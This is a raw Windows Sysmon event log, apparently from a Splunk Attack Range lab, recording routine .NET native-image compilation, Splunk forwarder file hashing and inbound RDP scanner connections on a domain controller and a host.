s\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 23542300x800000000000000075167Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:38.639{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F7635DFE3E1D7E8F493F256980967B80,SHA256=C3A95823DC3A13CBB294D217DBF99CCD849C2874ECB76CBAA6C2B8B6561D7CF0,IMPHASH=00000000000000000000000000000000falsetrue 11241100x800000000000000075166Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:57:38.592{A7A01FEF-EBE2-607E-0E0D-00000000BB01}5852C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\16dc-0\Microsoft.Office.Tools.Excel.dll2021-04-20 14:57:38.592 354300x800000000000000075165Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:37.093{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.85scanner.openportstats.com59754-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000075164Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:36.922{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-35284-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000075163Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:36.917{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-38012-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 10341000x800000000000000075162Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:38.295{A7A01FEF-B625-607E-0C00-00000000BB01}6686156C:\Windows\system32\svchost.exe{A7A01FEF-EBE2-607E-0E0D-00000000BB01}5852C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000075161Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:38.280{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EBE2-607E-0E0D-00000000BB01}5852C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000075160Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:38.280{A7A01FEF-EBDA-607E-C60C-00000000BB01}35121112C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBE2-607E-0E0D-00000000BB01}5852C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000075159Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:38.249{A7A01FEF-B625-607E-0C00-00000000BB01}6686156C:\Windows\system32\svchost.exe{A7A01FEF-EBE2-607E-0D0D-00000000BB01}6468C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000075158Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:38.233{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EBE2-607E-0D0D-00000000BB01}6468C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000075157Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:38.233{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBE2-607E-0D0D-00000000BB01}6468C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000075156Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:57:38.170{A7A01FEF-EBE1-607E-0C0D-00000000BB01}6852C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1ac4-0\Microsoft.Office.Tools.Common.Implementation.dll2021-04-20 14:57:38.170 23542300x800000000000000050300Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:38.458{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=DECE82DE68D172EB2B4F5DAC126FCA73,SHA256=01A1915CAA4E6CF69156E41245481EA6710D1FCF7199262523D177FEA2224AC2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000050299Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:38.411{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BD3EA46A81B2C15B016A452D7D9370A1,SHA256=A1C82E0D66750EF84153153E8FF3DB364CB119F626F5F2B4D0AA5E3077F6EB8B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000075196Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:39.952{A7A01FEF-B625-607E-0C00-00000000BB01}6686156C:\Windows\system32\svchost.exe{A7A01FEF-EBE3-607E-160D-00000000BB01}5984C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000075195Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:39.936{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EBE3-607E-160D-00000000BB01}5984C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000075194Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:39.936{A7A01FEF-EBDA-607E-C60C-00000000BB01}35121112C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBE3-607E-160D-00000000BB01}5984C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000075193Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:39.905{A7A01FEF-B625-607E-0C00-00000000BB01}6686156C:\Windows\system32\svchost.exe{A7A01FEF-EBE3-607E-150D-00000000BB01}1572C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000075192Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:39.889{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{A7A01FEF-EBE3-607E-150D-00000000BB01}1572C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000075191Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:39.889{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBE3-607E-150D-00000000BB01}1572C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000075190Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:57:39.858{A7A01FEF-EBE3-607E-140D-00000000BB01}6844C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1abc-0\Microsoft.Office.Tools.Outlook.Implementation.dll2021-04-20 14:57:39.858 10341000x800000000000000075189Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:39.717{A7A01FEF-B625-607E-0C00-00000000BB01}6686156C:\Windows\system32\svchost.exe{A7A01FEF-EBE3-607E-140D-00000000BB01}6844C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000075188Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:39.702{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EBE3-607E-140D-00000000BB01}6844C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000075187Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:39.702{A7A01FEF-EBDA-607E-C60C-00000000BB01}35121112C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBE3-607E-140D-00000000BB01}6844C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 23542300x800000000000000075186Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:39.655{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B4CF0AB47AD1697AAF10AF5A62796A4A,SHA256=60A07D6D7AF3B1281132BF0C84865843AC56CA3AB26F8B6BB608AE1ED8EA53A8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000075185Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:39.655{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C1912A88BDB217A499439BF76FED5801,SHA256=404E49E9E5ACB1A8E2A94B1DE5864F40403D259B8E753340128F4B8144122BD3,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000075184Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:39.639{A7A01FEF-B625-607E-0C00-00000000BB01}6686156C:\Windows\system32\svchost.exe{A7A01FEF-EBE3-607E-130D-00000000BB01}5556C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000075183Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:39.623{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EBE3-607E-130D-00000000BB01}5556C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000075182Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:39.623{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBE3-607E-130D-00000000BB01}5556C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000075181Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:57:39.592{A7A01FEF-EBE3-607E-120D-00000000BB01}4508C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\119c-0\Microsoft.Office.Tools.Outlook.dll2021-04-20 14:57:39.592 10341000x800000000000000075180Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:39.514{A7A01FEF-B625-607E-0C00-00000000BB01}6686156C:\Windows\system32\svchost.exe{A7A01FEF-EBE3-607E-120D-00000000BB01}4508C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 